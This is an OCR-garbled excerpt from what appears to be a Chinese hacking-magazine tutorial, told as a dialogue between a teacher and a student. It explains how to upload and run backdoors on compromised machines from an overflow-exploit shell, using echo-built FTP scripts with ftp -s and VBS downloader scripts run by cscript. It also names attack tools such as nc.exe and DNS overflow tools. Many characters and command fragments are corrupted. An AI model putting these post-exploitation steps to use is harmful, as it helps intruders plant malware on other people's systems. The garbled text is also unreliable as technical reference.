如发现有乱码，请点击下面链接浏览原文
正文摘录:

3、介绍了TFTP就不能不说说FTP方式，玩过溢出的都知道，在溢出shell下用FTP命令登录服务器输入用户名后没等输入密码cMD窗口就停顿在那里处于假死状态了。那么就真的不能使用FTP方式吗?错了，FTP服务是支持脚本登录的，命令如下：以上是利用echo命令写FTP命令到ftp.txt文件中，其中user是FTP帐号，pass是FTP的密码。ftp一0：ftp.txt，调用FTP的一s参数执行脚本的内容，自动开始连接FTP服务器了。如果FTP的端口不是系统默认的21号怎么办呢?那就改成echoopenFTP服务器IPFTP服务器螭口>ftp.txt就OK了。那么下载的文件被保存到哪里去了呢?系统会自动保存在system32目录下，如果是win2000系统就是“c：＼wiriftt＼system32”，如果是WinXP／2003系统就是“c：＼windows＼system32”目录下。4、写vBs脚本下载程序，只要把源码保存到一个文件中就能运行。所以在shell下用echo语句直接写到一个文件中，再用相应的解释程序执行就可以啦。例如：然后执行cscr’；ptiget.vb·就可以了，系统会自动联网去下载文件。5、在溢出后的CMDSHELL中执行燕妹妹不解的问道：“感觉原来的文件是mmexe，可下载回来怎么成了mm【1】.exe呢?”阿布笑呵呵的说道：“其实这个地方是微软在编写IE缓存时留下的问题，比如每个论坛都有自己的logo，通常会保存为logo.gif，如果你访问一个论坛就在缓存中保存了一个，如果你再去访问另一个论坛呢?它的l0g0.gif岂不是要覆盖掉以前的那个?所以微软就把下载回来的文件改了名字，就变成了我们看到的mm【1】.exe。”燕妹妹高兴的说道：“真是条条大路通肉鸡，上传文件还有这么多方法。”阿布自豪的说道：。上面讲述了五种常用的常见的在溢出后上传后门的方法，现在你应该对CMD命令下文件的上传有了一个整体的认识。”燕妹妹突然问道：“现在已经把文件传上去了，那么要怎么才能让它执行呢?”阿布说：“其实就跟本机的CMD一样，先进入到程序的目录然后敲人文件名字加回车就可以执行了，就是这么简单!”阿布看了一下手机说道：“时间也差不多了，今天就到这儿吧!”燕妹妹说道：“今天学的真有意思，下个月我还是上不不了网的，爸妈不在家.没人修电脑。”阿布嗯了一声说道：“咱约个地点，下次一起去网吧。教你点更有意思的。保证让你高兴的三天睡不着觉。给你透露一下吧!是加密解密、嗅探监听。”燕妹妹应了一声兴冲冲的走了。(文章中涉及到的fjndpass、Advar)tedwindowsPass—wondP~ecovery、Rect彻、dns溢出工具、nc.exe、tptpd52等，已经收录在光盘中)瞄